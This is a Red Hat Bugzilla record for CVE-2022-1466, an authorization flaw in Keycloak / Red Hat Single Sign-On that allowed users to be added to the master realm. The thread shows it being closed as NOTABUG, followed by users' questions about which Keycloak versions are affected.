Bug 2050228 (CVE-2022-1466)

Summary: CVE-2022-1466 keycloak: Improper authorization for master realm
Product: [Other] Security Response Reporter: Pedro Sampaio <psampaio>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: aboyko, aileenc, ajaiswal595, alazarot, anstephe, arulanandhaguru.i, avibelli, bgeorges, bibryam, boliveir, chazlett, cmoulliard, dkreling, drieden, emingora, etirelli, ggaughan, gmalinko, hbraun, ibek, ikanello, janstey, jochrist, jrokos, jstastny, jwon, krathod, kverlaen, lthon, mnovotny, mszynkie, pantinor, pdelbell, pdrozd, peholase, pgallagh, pjindal, rguimara, rrajasek, rruss, security-response-team, sthorger, tero.saarni, tzimanyi
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: keycloak 17.0.1 Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in Keycloak. The Red Hat Single Sign-On allowed authed users to perform actions outside their permissions. This flaw makes adding users to the master realm possible even though no respective permission was granted.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2022-04-12 12:47:37 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On:    
Bug Blocks: 2031181, 2078615    

Description Pedro Sampaio 2022-02-03 13:51:05 UTC 
Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions that they should not be allowed to perform. It was possible to add users to the master realm even though no respective permission was granted.

References:

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt
https://www.syss.de/pentest-blog/fehlerhafte-autorisierung-bei-red-hat-single-sign-on-750ga-syss-2021-076
Comment 2 Bruno Oliveira 2022-04-08 20:12:05 UTC 
I would like to know more details about this issue, like:

- Are those users performing actions that they should not be allowed present on the master realm?
- If they are present on the master realm, which roles are assigned to them? Do they have any client roles?
- Would be possible to have the screenshots from the "Role Mappings" tab for the user who managed to escalate those privileges?
Comment 4 Bruno Oliveira 2022-04-11 23:18:39 UTC 
I had a great chat with Patrick, and we identified that the issue is no longer present on the latest releases of RH-SSO and Keycloak. 

Thank you for your collaboration!
Comment 7 Tero Saarni 2022-05-06 10:15:04 UTC 
I cannot find proper information on affected Keycloak versions.  I would like to request for clarification.

* The CVE https://access.redhat.com/security/cve/cve-2022-1466 mentions Keycloak but it does not mention affected Keycloak versions 
* The CVE in NVD only mentions Red Hat Single Sign-On and not Keycloak https://nvd.nist.gov/vuln/detail/CVE-2022-1466
* This bugzilla issue is the only place with version information "Fixed In Version: keycloak 17.0.1" but this issue was resolved with "NOTABUG"
* None of the github security advisories mentions CVE-2022-1466 https://github.com/keycloak/keycloak/security/advisories
* I tried to reproduce the fault with various Keycloak versions backing all the way to Keycloak 12.0.0 by following the details given in disclosure document https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt but I could not reproduce it.

Please, would you clarify the affected Keycloak versions?

Thank you for your help!
Comment 8 Tero Saarni 2022-05-06 11:14:40 UTC 
Sorry, I forgot to mention also that Keycloak 17.0.1 release notes do not mention anything that sounds like this bug, or fixes to security vulnerabilities in general https://www.keycloak.org/2022/03/keycloak-1701-released
Comment 9 arulguru 2022-05-06 13:15:12 UTC 
(In reply to Tero Saarni from comment #7)
> I cannot find proper information on affected Keycloak versions.  I would
> like to request for clarification.
> 
> * The CVE https://access.redhat.com/security/cve/cve-2022-1466 mentions
> Keycloak but it does not mention affected Keycloak versions 
> * The CVE in NVD only mentions Red Hat Single Sign-On and not Keycloak
> https://nvd.nist.gov/vuln/detail/CVE-2022-1466
> * This bugzilla issue is the only place with version information "Fixed In
> Version: keycloak 17.0.1" but this issue was resolved with "NOTABUG"
> * None of the github security advisories mentions CVE-2022-1466
> https://github.com/keycloak/keycloak/security/advisories
> * I tried to reproduce the fault with various Keycloak versions backing all
> the way to Keycloak 12.0.0 by following the details given in disclosure
> document
> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-
> 076.txt but I could not reproduce it.
> 
> Please, would you clarify the affected Keycloak versions?
> 
> Thank you for your help!

The issue wasn't reproducible when i tried either but I found CVE-2022-1466 in github advisory db where it says every version >17.0.1 is affected.
https://github.com/advisories/GHSA-f32v-vf79-p29q
Comment 10 Tero Saarni 2022-05-06 13:35:27 UTC 
Interesting.  That github advisory is for maven package keycloak-core, so likely it comes from maven central where every keycloak-core package prior to 17.0.1 is now flagged with CVE-2022-1466, for example https://mvnrepository.com/artifact/org.keycloak/keycloak-core/16.1.1.  Since the github advisory was created on Apr 27 and the version information "Fixed In Version: keycloak 17.0.1" in this bugzilla issue was added on Apr 25, I guess this issue is the source.
Comment 11 ajaiswal595 2022-06-21 14:02:34 UTC 
@security-response-team

If we are not enabled SSO are we still vulnerable to these two CVE CVE-IDCVE-ID: CVE-2022-1466 and CVE-IDCVE-ID: CVE-2022-1245